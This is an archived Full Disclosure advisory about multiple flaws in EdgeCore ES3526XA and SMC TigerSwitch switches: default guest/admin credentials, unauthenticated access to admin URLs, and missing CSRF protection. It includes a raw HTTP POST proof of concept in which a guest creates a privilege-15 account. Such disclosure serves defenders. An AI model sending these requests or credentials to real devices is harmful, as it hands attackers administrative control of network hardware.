| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 23 Jun 2016 20:06:48 +0000 From: Karn Ganeshen <karnganeshen@...il.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] EdgeCore - ES3526XA Manager - Multiple Vulnerabilities *EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager - Multiple Vulnerabilities* Also rebranded as: *SMC TigerSwitch 10/100 SMC6128L2 Manager* Object ID: 1.3.6.1.4.1.259.8.1.5 Switch Information ________________________________________ Main Board: Number of Ports 26 Hardware Version R01 Management Software: Loader Version 1.0.0.2 Boot-ROM Version 1.0.0.5 Operation Code Version 1.28.16.14 Object ID: 1.3.6.1.4.1.202.20.66 Switch Information ________________________________________ Main Board: Number of Ports 28 Hardware Version R01 Chip Device ID Marvell 98DX106-B0, 88E6095[F] Internal Power Status Active Management Software: EPLD Version 0.07 Loader Version 1.0.2.0 Boot-ROM Version 1.2.0.1 Operation Code Version 1.4.18.2 Role Master Other firmware / software versions may also be affected. *Vendor Response*: These models are no longer supported. *Vulnerability Details* *1. Weak Credentials Management * Guest / guest – priv 0 - read privileges to most device configuration Admin/admin – priv 15 - read/write access *Issue:* Mandatory password change not enforced by the application. *2. Access Control Flaws* Any functions can be performed by directly calling the function URL (GET/POST) without any authentication. This includes creating new privileged user(s), changing (admin) passwords, deleting user(s), reading/changing device configuration, rebooting device etc. + Guest can also perform any administrative functions such as add,update,delete users *PoC 1:* For example, anyone can access these urls directly, without any authentication: http://IP/config/153/sysinfo.htm?unit=1 http://IP/config/153/port_config.htm?unit= http://IP/home/153/active_panel_bid0.htm?unit=1 http://IP/config/upnp_config.htm http://IP/config/153/user_accounts.htm *PoC 2:* Create a new privileged account: POST /config/153/user_accounts.htm HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://IP/config/153/user_accounts.htm Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 166 page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=&passwd_new=&passwd_confirm= *Issue:* Application does not enforce access control correctly. *3. Vulnerable to Cross-Site Request Forgery * There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as password change, configuration parameter changes, saving modified configuration, & device reboot. +++++ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists